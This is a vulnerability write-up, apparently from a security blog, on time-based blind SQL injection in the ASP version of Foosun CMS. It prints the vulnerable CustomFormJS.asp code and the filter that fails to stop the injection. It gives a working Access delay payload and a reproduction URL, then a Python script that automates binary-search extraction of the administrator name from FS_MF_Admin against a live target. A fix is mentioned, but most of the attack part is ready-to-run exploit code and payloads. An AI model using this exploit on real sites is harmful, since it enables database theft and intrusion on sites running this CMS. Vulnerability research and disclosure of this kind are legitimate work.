
SQL injection in the ASP version of Foosun (风讯) CMS

[2018.01.15]

Having dug into the .NET version, there is no reason not to dig into the ASP version as well; after all, the ASP version of Foosun is the older of the two.


Vulnerable code (in CustomForm/CustomFormJS.asp, per the reproduction URL below):

' Every query-string parameter passes through NoSqlHack() before use.
CustomFormID = NoSqlHack(request.QueryString("CustomFormID"))
FormStyleID = NoSqlHack(request.QueryString("FormStyleID"))
DataStyleID = NoSqlHack(request.QueryString("DataStyleID"))
TextCSS = NoSqlHack(request.QueryString("TextCSS"))
if TextCSS <> "" then TextCSS = " Class=""" & TextCSS & """"
SelectCSS = NoSqlHack(request.QueryString("SelectCSS"))
if SelectCSS <> "" then SelectCSS = " Class=""" & SelectCSS & """"
OtherCSS = NoSqlHack(request.QueryString("OtherCSS"))
if OtherCSS <> "" then OtherCSS = " Class=""" & OtherCSS & """"
' The only check on CustomFormID is that it is non-empty.
if CustomFormID = "" then
    Response.Write("document.write('调用表单参数传递错误');" & vbcrlf)   ' "form parameter passing error"
    Response.End
end if
' CustomFormID is concatenated into the WHERE clause as a bare number, with no quotes and no type check.
form_sql="select id,formName,tableName,VerifyLogin,StartTime,EndTime,Validate,TimeLimited from FS_MF_CustomForm where state=0 and id=" & CustomFormID
set obj_form_rs=conn.execute(form_sql)


The first thing to notice is that CustomFormID is appended to form_sql without any single quotes around it, which under normal circumstances means a straightforward injection. The parameter does, however, pass through a function called NoSqlHack first, so that needs a look:


Function NoSqlHack(FS_inputStr)
    FS_inputStr = Trim(FS_inputStr)
    If FS_inputStr = "" Or Isnull(FS_inputStr) Then
        FS_inputStr = ""
    End if
    FS_inputStr = Replace(FS_inputStr,Chr(39),"'")    ' single quote (Chr(39)); the only replacement that is still active
    'FS_inputStr = Replace(FS_inputStr,";","")         ' semicolon: commented out
    'FS_inputStr = Replace(FS_inputStr," ","")         ' space: commented out
    'FS_inputStr = Replace(FS_inputStr,"%","")         ' percent sign: commented out
    'FS_inputStr = Replace(FS_inputStr," ","")         ' space again: commented out
    NoSqlHack = FS_inputStr
End Function


As shown on the page, the only active replacement is of the single quote (the semicolon, space and % replacements are all commented out), and since CustomFormID is used as an unquoted number, a payload never needs a quote in the first place: the filter has no effect whatsoever on the injection. The proper fix is to verify that CustomFormID is an integer before concatenating it (or to stop concatenating and use a parameterised query). If the table had rows, the result could be read back through the page's output, but FS_MF_CustomForm is empty by default, which leaves only time-based (delay) injection. Access has no sleep() function, so the delay is produced by a heavy query: a ten-way cross join of the system table MSysAccessObjects, run only when the guessed character matches.


Conditional delay payload (the iif() runs the heavy count only when the first character of name is "a", otherwise it returns the constant 3):

(select iif(mid(name,1,1)="a",(SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10)<>0,3) from FS_MF_Admin where ID =4)


Local reproduction (the UNION supplies eight columns to match the eight selected from FS_MF_CustomForm, and compares via asc() so no quotes are needed; asc()=100 tests whether the second character of admin_name is "d"):


http://localhost:8001/CustomForm/CustomFormJS.asp?CustomFormID=1 union select 1,(select iif(asc(mid(admin_name,2,1))=100,(SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10)<>0,3) from FS_MF_Admin where ID =4),3,4,5,6,7,8 from FS_MF_Admin&TextCSS=1&SelectCSS=1&OtherCSS=1


Success: when the guess is right the response hangs for the duration of the heavy query; when it is wrong it returns immediately.
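The manual URL above tests one character against one value. The following script, added here as an example and not code from the original post or from Foosun, automates the same technique: it builds the eight-column UNION payload from the post, uses the asc()/mid() comparison with `>` instead of `=` so each character is found by binary search in about seven requests rather than up to ninety-five, and measures the response time as the oracle. The target URL, table, column and row ID come from the post; the delay threshold, timeout and the offline `fake_oracle` (a stand-in for the Access back end so the extractor can be run without a target) are assumptions made here.

```python
"""Time-based blind extraction for the CustomFormJS.asp injection (added example)."""
import re
import time
import urllib.error
import urllib.parse
import urllib.request

# Heavy query from the post: a ten-way cross join of the Access system table
# MSysAccessObjects, used as the "sleep" that Jet/Access does not provide.
HEAVY = "(SELECT count(*) FROM " + ", ".join(
    f"MSysAccessObjects AS T{i}" for i in range(1, 11)) + ")<>0"


def payload(pos: int, op: str, code: int, row_id: int = 4,
            column: str = "admin_name", table: str = "FS_MF_Admin") -> str:
    """Value for CustomFormID: the post's 8-column UNION, with an iif() that runs
    the heavy query only when asc(mid(column,pos,1)) <op> code holds."""
    cond = f"asc(mid({column},{pos},1)){op}{code}"
    inner = f"(select iif({cond},{HEAVY},3) from {table} where ID={row_id})"
    return f"1 union select 1,{inner},3,4,5,6,7,8 from {table}"


def http_oracle(base_url: str, threshold: float = 3.0, timeout: float = 30.0):
    """Oracle against a live target: True when the request takes >= threshold
    seconds (a timeout also counts, a fast connection error does not)."""
    def ask(value: str) -> bool:
        qs = urllib.parse.urlencode({"CustomFormID": value, "TextCSS": "1",
                                     "SelectCSS": "1", "OtherCSS": "1"})
        t0 = time.monotonic()
        try:
            urllib.request.urlopen(f"{base_url}?{qs}", timeout=timeout).read()
        except (urllib.error.URLError, OSError):
            pass
        return time.monotonic() - t0 >= threshold
    return ask


_COND = re.compile(r"asc\(mid\(admin_name,(\d+),1\)\)(>|=)(\d+)")


def fake_oracle(secret: str):
    """Constructed stand-in for the back end: evaluates the injected condition
    against a known secret, so the extractor runs offline. Past the end of the
    string mid() yields Null, so the condition is false and there is no delay."""
    def ask(value: str) -> bool:
        m = _COND.search(value)
        pos, op, code = int(m.group(1)), m.group(2), int(m.group(3))
        if pos > len(secret):
            return False
        c = ord(secret[pos - 1])
        return c > code if op == ">" else c == code
    return ask


def extract_char(ask, pos: int, lo: int = 0, hi: int = 127) -> int:
    """Binary search for the ASCII code at position pos; 0 means end of string
    (every '>' test is false once mid() runs past the end)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(payload(pos, ">", mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(ask, max_len: int = 32) -> str:
    """Extract admin_name character by character until the end-of-string marker."""
    out = []
    for pos in range(1, max_len + 1):
        c = extract_char(ask, pos)
        if c == 0:
            break
        out.append(chr(c))
    return "".join(out)


if __name__ == "__main__":
    print(extract(fake_oracle("admin")))  # offline demo against the constructed oracle
    # Live run against the post's local target (assumed reachable):
    # print(extract(http_oracle("http://localhost:8001/CustomForm/CustomFormJS.asp")))
```

The threshold should be set from a baseline: send a payload whose condition is certainly false and one whose condition is certainly true (for example `asc(mid(admin_name,1,1))>0`) and place the threshold between the two timings, since the cross join's cost depends on how many rows MSysAccessObjects holds on that installation.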


Copyright 北京通和实益电信科学技术研究所有限公司. All rights reserved. 京ICP备15030238号-1